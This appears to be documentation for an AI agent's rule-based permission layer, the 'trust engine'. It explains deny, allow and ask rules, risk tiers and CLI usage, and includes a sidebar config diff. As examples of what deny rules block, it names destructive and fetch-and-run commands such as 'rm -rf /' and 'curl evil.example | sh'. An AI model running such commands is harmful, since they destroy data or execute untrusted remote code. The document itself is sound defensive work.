description: Rule-based allow/deny/ask for tool invocations — an opt-in permission layer that sits before the yolo bypass.
---
# Trust Engine
The trust engine is a rule-based permission layer that sits **before** the pattern-based dangerous-command detector and the `--yolo` bypass. It gives you fine-grained, declarative control over which tool invocations auto-approve, always prompt, or are flat-out forbidden.
**Opt-in by design.** If `~/.hermes/trust.json` doesn't exist, nothing changes — every call returns `no_match` and the existing flow runs unchanged.
Inspired by Vellum Assistant's Trust Rules v3 schema.
## Evaluation order
```
tool invocation
→ hardline floor ← cannot be overridden (rm -rf /, shutdown, ...)
→ trust engine ← this doc
├── deny rule matched → blocked (BEATS --yolo)
├── allow rule matched → bypass dangerous-pattern check
├── ask rule matched → always prompt, even under --yolo
└── no_match → fall through
→ --yolo / session yolo → allow
→ dangerous-pattern check
→ prompt / auto-approve based on threshold
```
A **deny** rule is a user-expressed invariant — "never let the agent do this, even under yolo." Hardline commands (`rm -rf /`, `dd if=...`, kernel panics) still can't be allowed: those are non-negotiable.
## Rule shape
Rules live in `~/.hermes/trust.json` as a JSON array:
```json
[
{
"id": "allow-git-readonly",
"tool": "terminal",
"pattern": "git status*",
"scope": "everywhere",
"decision": "allow",
"priority": 100
},
{
"id": "deny-dangerous-pipes",
"tool": "terminal",
"pattern": "*curl*|*sh*",
"decision": "deny",
"priority": 200
}
]
```
| Field | Required | Default | Meaning |
|---|---|---|---|
| `id` | yes | — | Unique identifier (alphanumerics + `-`/`_`) |
| `tool` | no | `*` | Tool name the rule applies to. `*` matches any tool. |
| `pattern` | no | `*` | [fnmatch glob](https://docs.python.org/3/library/fnmatch.html) against the candidate string (the shell command for `terminal`, the path for file tools). Case-insensitive fallback. |
| `scope` | no | `everywhere` | Path prefix — only enforced for file tools when a path is provided. |
| `decision` | yes | — | `allow` \| `deny` \| `ask` |
| `priority` | no | `50` | Higher wins; **deny beats allow / ask on ties**. |
## Risk classification
Each invocation is tagged low / medium / high based on the tool:
- **Low** — `file_read`, `search_files`, `glob`, `grep`, `list_directory`, `web_search`, `web_extract`, `web_fetch`, `browser_*_navigate`, and shell commands NOT flagged by the dangerous-pattern detector.
- **Medium** — `file_write`, `patch`, `write_file`, `file_edit`, `host_file_write`, and unclassified tools.
- **High** — shell commands flagged by the existing dangerous-pattern detector.
## Threshold — what auto-approves when no rule matches
```yaml
# config.yaml
approvals:
auto_approve_up_to: low # none | low | medium | high
```
| `auto_approve_up_to` | Low | Medium | High |
|---|---|---|---|
| `none` | prompt | prompt | prompt |
| `low` (default) | auto-allow | prompt | prompt |
| `medium` | auto-allow | auto-allow | prompt |
| `high` | auto-allow | auto-allow | auto-allow |
**Deny rules always beat the threshold.** The threshold only applies when no rule matched the invocation.
## CLI
```bash
hermes trust list # show all rules, sorted by priority
hermes trust show <rule-id> # print one rule's full body
hermes trust add --tool terminal \
--pattern 'git status*' \
--decision allow \
--priority 100
hermes trust remove <rule-id>
hermes trust init # seed a starter bundle (git-readonly, ls, file_read)
# Debug: what would happen for a specific invocation?
hermes trust why --tool terminal --cmd "git push origin main"
```
`hermes trust why` prints the full explain payload — every matched rule, the winner, the computed risk, the active threshold, and whether the threshold would auto-approve on `no_match`.
## Example policy: "never pipe untrusted scripts into a shell"
```bash
hermes trust add --id deny-curl-sh \
--tool terminal \
--pattern '*curl*|*sh*' \
--decision deny --priority 200
```
Even under `--yolo`, the agent can no longer run `curl evil.example | sh` — the trust engine blocks it before yolo sees it.
## Example policy: low-noise read-only workflows
```bash
hermes trust init
```
Seeds a handful of starter rules allowing `git status`, `git log`, `git diff`, `ls`, `cat`, and the read-only file tools. Review with `hermes trust list` and remove any you don't want.
## Caveats
- The trust engine currently hooks into the `terminal` tool approval path (the one place permission matters most). File-tool integration is planned as a follow-up — the engine will be callable from file-tool wrappers so rules with `tool: file_write` take effect, but today only `terminal` rules are enforced at the approval site.
- Rule `scope` requires the caller to pass a `path` argument. `terminal` doesn't, so `scope` is currently only meaningful once file-tool integration lands.
- The dangerous-pattern detector is still the final gatekeeper when no rule matches — trust rules extend it, they don't replace it.

View File

@@ -58,6 +58,13 @@ const sidebars: SidebarsConfig = {
'user-guide/features/built-in-plugins',
],
},
{
type: 'category',
label: 'Security',
items: [
'user-guide/features/trust-engine',
],
},
{
type: 'category',
label: 'Automation',